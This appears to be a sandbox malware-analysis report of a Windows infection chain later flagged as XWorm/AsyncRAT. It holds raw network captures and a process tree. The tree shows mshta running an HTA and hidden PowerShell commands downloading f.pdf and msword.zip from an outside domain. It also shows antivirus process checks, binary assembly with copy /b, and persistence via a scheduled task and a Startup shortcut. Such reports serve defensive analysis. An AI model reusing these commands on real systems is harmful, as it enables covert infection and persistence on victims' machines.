                                                                      2024-12-16 00:33:05 UTC16384INData Raw: ea 08 c0 a1 7c 8e 9c 56 d5 44 e8 9b d4 33 ba 08 c3 da 87 84 08 7e 11 c4 53 e1 9e 29 91 d6 bc 1e 1a 4f 48 c2 13 a2 86 b2 e3 40 89 58 77 16 92 97 c4 bf 0d 3f c1 1c 7e 47 5d 5e 14 c6 22 61 58 71 42 a8 22 28 e0 fa 4e c2 9b 49 0d b8 c7 61 38 7a a8 6b 30 a1 37 88 20 46 05 8f ae 28 12 d4 47 14 c4 17 08 3d 68 25 a4 21 bc 36 60 6f f7 a0 81 05 98 48 10 b6 5d 62 08 f6 3d 30 aa 12 08 2d 04 1f a0 8a 70 8b ea d1 1d 78 45 0e bf 31 d0 73 3f 08 a1 d7 91 d6 81 11 fd f3 08 63 61 1c 5d 68 21 f1 f7 68 c6 33 c4 4c 75 49 42 07 c4 3b f9 84 2d 50 98 ea 92 84 38 bb fc 28 3a 7f 8d 16 39 87 ce ea d8 df 15 61 a7 6b 58 41 ed 62 85 21 88 4a ac c0 47 57 18 28 df 16 a1 55 c1 11 ee a6 7a 5b 48 a1 dd c4 d3 1b 40 8a f0 e3 d2 08 2e 9d dd d3 48 60 88 f8 6c 11 44 45 3f ee 18 60 c6 a5 44 5a ef
                                                                      Data Ascii: |VD3~S)OH@Xw?~G]^"aXqB"(NIa8zk07 F(G=h%!6`oH]b=0-pxE1s?ca]h!h3LuIB;-P8(:9akXAb!JGW(Uz[H@.H`lDE?`DZ
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: ad 18 4b 1a 97 ef 54 81 15 08 45 dc fc a5 f3 f9 7c bd 58 8b b9 9f 64 78 f6 5f 30 ab 11 dc cd 18 cc 22 46 5d 35 42 3b 44 34 6a 4d 0a ed 6c 22 46 51 97 eb 73 aa c5 a7 1f ac 68 a3 3a e1 c4 53 b5 b8 84 1d c9 f2 13 d0 4c 64 f9 74 6b 56 35 88 88 88 b1 89 f4 5f 35 f5 88 88 88 be 26 32 0d 0a e3 42 2d 0e e2 44 d1 8e 61 d3 5c d0 58 e6 1f 2d c2 30 84 41 15 07 7c c3 98 70 53 0f 8a 16 b5 43 40 88 e1 4e 71 5f 10 96 61 e9 31 ab 14 a2 3d a0 44 7f 49 53 bb 51 b5 11 0a 35 fd c3 65 4e 47 6c a1 ca 71 8a 69 59 1f 36 81 12 1f 1d 29 74 81 17 59 81 92 22 3f 70 40 8e 3d d8 e3 23 e2 66 8c 69 90 f3 ea ae f2 3d f9 1d 20 45 d2 66 11 7d 06 92 c2 23 e0 8e 39 87 c4 44 64 7e ec 4c 44 3c 4b ac 11 c7 a1 64 7d 6f cf e2 63 3a 21 2f dd c6 47 93 b4 d4 fe 26 10 97 5d e9 9e d5 35 11 2e b3 3d 32
                                                                      Data Ascii: KTE|Xdx_0"F]5B;D4jMl"FQsh:SLdtkV5_5&2B-Da\X-0A|pSC@Nq_a1=DISQ5eNGlqiY6)tY"?p@=#fi= Ef}#9Dd~LD<Kd}oc:!/G&]5.=2
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: 49 82 fd d7 b0 6b 54 ec 35 0e f3 0f 4c bb 60 a1 08 87 ff c3 83 c3 41 b5 62 e2 14 44 f6 f6 20 8a bb 84 71 e5 91 50 33 76 bf 07 f5 f8 3d ce e0 31 8b 62 13 15 34 44 76 a9 82 67 11 84 10 4e da f8 41 60 cc 38 ba c2 67 30 47 1f 61 cb ea b0 44 7d 8a 72 c8 14 1a 4d 8f e1 f6 fd 58 3b a2 64 19 99 27 36 74 e8 24 20 f9 1e 85 40 b8 2d ff 88 82 04 0a 1c 48 fb 74 47 e2 c8 f1 cc df 97 63 15 a0 84 5c b2 16 06 b7 f8 7f 4b e1 f8 22 1a 6c 81 24 3b 6c da 4c 30 92 2e b1 b1 75 08 21 9d d9 84 be 96 6f 43 34 93 23 cd 04 56 43 8d a0 ed b4 58 f1 09 98 ac b2 0b 02 a6 4a 1f ef b7 f4 c1 db 40 88 6d 32 0c e2 c3 15 14 82 0c be 2e 35 e1 b1 06 df 7c 42 2d d4 32 3f 41 02 23 a0 98 b9 cd 30 e1 bb 23 a6 9b 34 56 1b 23 c1 02 cb 20 90 32 bf fb 7e 97 b0 7e 08 3c ba 12 f5 c1 25 4a 7d 67 f0 81 0b
                                                                      Data Ascii: IkT5L`AbD qP3v=1b4DvgNA`8g0GaD}rMX;d'6t$ @-HtGc\K"l$;lL0.u!oC4#VCXJ@m2.5|B-2?A#0#4V# 2~~<%J}g
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: b1 65 3b 4c 22 a8 7e 82 4d 84 b6 55 b1 15 41 11 f5 ad 2b 45 db 62 3f fe 35 44 1b 47 f2 c7 ff ff d7 ef 75 69 76 c4 42 36 bb 47 d4 e2 8f 6d b5 a4 20 c5 bc 48 e8 20 56 91 71 22 c2 1a 08 8f 98 df b8 52 6c c2 4d 7e 6a 83 1f bb fe dd 57 5f af fe b6 61 18 52 87 17 fa 4c a1 ca 78 30 84 45 bc fa 35 60 98 ff c9 0e 11 1d 36 6e 50 87 09 94 e0 8c 20 60 88 fa 2a 02 23 8a 08 13 68 11 1d 38 61 c2 23 ab 5f 6f 91 5c ce a2 e8 1a d9 27 20 90 4d d5 89 83 85 fa aa fa b0 d0 9c 71 10 69 af 4b 8b 89 f4 46 40 8a 78 dc 34 11 a6 db bd 53 e3 4c 5e 21 82 c2 87 16 08 12 4c 57 04 0b 68 11 43 82 0b b1 55 fb 63 b1 15 50 85 8d 3f 5a 5d 69 7e 1c 54 83 71 fd 28 5c 44 f3 48 be b6 47 44 74 48 d5 a6 50 7e f5 47 74 22 50 85 13 1e a5 d0 de 9a 29 d3 08 8f bf 0c 63 1e bf 4b 7f 08 84 82 f8 83 8f b4
                                                                      Data Ascii: e;L"~MUA+Eb?5DGuivB6Gm H Vq"RlM~jW_aRLx0E5`6nP `*#h8a#_o\' MqiKF@x4SL^!LWhCUcP?Z]i~Tq(\DHGDtHP~Gt"P)cK
                                                                      2024-12-16 00:33:05 UTC16384INData Raw: a2 3c e6 31 d4 47 1f b8 43 88 9c 88 e8 61 28 4e b1 04 12 77 f0 43 42 d1 1f 2f 18 c9 09 36 ed b1 23 a4 11 84 69 0f 06 60 52 3c 5f b3 e8 20 42 67 62 4e a9 6a a0 d0 60 ef f9 f4 26 d2 16 ea 7b 1d de 82 c2 55 36 2f a5 17 46 d0 d9 c4 9b ae c2 53 0f 0c 11 d3 bf a5 31 89 3f 6e 3b b6 2d 0c 8b 77 61 17 04 23 ae 82 2d d0 30 40 99 1d 62 a8 a1 e2 90 eb 8a 97 49 36 de af f0 fc 5f 3f 07 51 39 8a 25 62 f8 a1 41 06 2e c4 44 c4 0a 48 7b 09 23 12 d8 dd ee e8 23 49 8b 10 65 20 af 28 76 25 fc 8f 03 1f 08 32 a0 32 3a 96 e9 5b a3 e8 9e a0 8e 82 de 5e 11 5b a6 ce 27 f5 4c 4c 2b 73 71 8b 3c fd a3 da d9 1d be 82 65 00 90 f1 10 46 81 82 05 f6 a1 04 08 32 3a 05 4e 92 16 c4 ba 38 ae fc 52 23 ab 34 b4 82 46 12 2b 2a 37 6d 37 2a 22 14 61 38 6d 21 c3 d4 21 17 2e d8 49 1c d0 42 14 3b ee
                                                                      Data Ascii: <1GCa(NwCB/6#i`R<_ BgbNj`&{U6/FS1?n;-wa#-0@bI6_?Q9%bA.DH{##Ie (v%22:[^['LL+sq<eF2:N8R#4F+*7m7*"a8m!!.IB;


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 193.26.115.214 | Destination Port: 443 | PID: 7340 | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 00:33:09 UTC | 167 bytes | OUT
GET /msword.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: myguyapp.com
Connection: Keep-Alive
2024-12-16 00:33:09 UTC | 285 bytes | IN
HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 00:33:09 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 29 Oct 2024 16:49:11 GMT
ETag: "3a0583-625a05d5cdaa6"
Accept-Ranges: bytes
Content-Length: 3802499
Connection: close
Content-Type: application/zip


Target ID: 0
Start time: 19:32:58
Start date: 15/12/2024
Path: C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit): true
Commandline: mshta.exe "C:\Users\user\Desktop\c2.hta"
Imagebase: 0xf40000
File size: 13'312 bytes
MD5 hash: 06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 2
Start time: 19:33:01
Start date: 15/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 19:33:01
Start date: 15/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 19:33:01
Start date: 15/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
Imagebase: 0xd70000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 19:33:05
Start date: 15/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
Imagebase: 0x7ff6bc1b0000
File size: 5'641'176 bytes
MD5 hash: 24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 19:33:05
Start date: 15/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Imagebase: 0xd70000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 19:33:06
Start date: 15/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase: 0x7ff74bb60000
File size: 3'581'912 bytes
MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 19:33:06
Start date: 15/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1592,i,11903606829876367620,16036057484725814875,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase: 0x7ff74bb60000
File size: 3'581'912 bytes
MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges: true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:12
                                                                      Start time:19:33:16
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                                                      Imagebase:0xd70000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:19:33:47
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:msword.exe
                                                                      Imagebase:0x400000
                                                                      File size:891'289'591 bytes
                                                                      MD5 hash:C744E054E4EF01832BBF43B81D397B61
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 8%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:19:33:47
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:19:33:47
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:19:33:47
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:timeout /t 90
                                                                      Imagebase:0xd50000
                                                                      File size:25'088 bytes
                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:19
                                                                      Start time:19:33:48
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:20
                                                                      Start time:19:33:48
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:21
                                                                      Start time:19:33:49
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0x600000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:19:33:49
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /I "wrsa opssvc"
                                                                      Imagebase:0x800000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:19:33:49
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0x600000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:24
                                                                      Start time:19:33:49
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                      Imagebase:0x800000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:25
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c md 220239
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:26
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /V "DimPieLilHot" Statistical
                                                                      Imagebase:0x800000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:27
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:28
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                      Wow64 process (32bit):true
                                                                      Commandline:Carter.pif F
                                                                      Imagebase:0xfe0000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316786960.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316786960.0000000003C81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316937916.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3261819598.00000000015E5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316904176.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001C.00000003.3316786960.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 8%, ReversingLabs
                                                                      Has exited:false

                                                                      Target ID:29
                                                                      Start time:19:33:50
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:choice /d y /t 5
                                                                      Imagebase:0xb10000
                                                                      File size:28'160 bytes
                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:30
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:31
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:32
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
                                                                      Imagebase:0x380000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:33
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:34
                                                                      Start time:19:33:51
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:35
                                                                      Start time:19:33:52
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                                                      Imagebase:0x7ff63a320000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:36
                                                                      Start time:19:33:52
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
                                                                      Imagebase:0x830000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 8%, ReversingLabs
                                                                      Has exited:true

                                                                      Target ID:37
                                                                      Start time:19:34:03
                                                                      Start date:15/12/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
                                                                      Imagebase:0x7ff63a320000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:38
                                                                      Start time:19:34:03
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
                                                                      Imagebase:0x8b0000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:40
                                                                      Start time:19:35:35
                                                                      Start date:15/12/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
                                                                      Imagebase:0x4e0000
                                                                      File size:65'440 bytes
                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
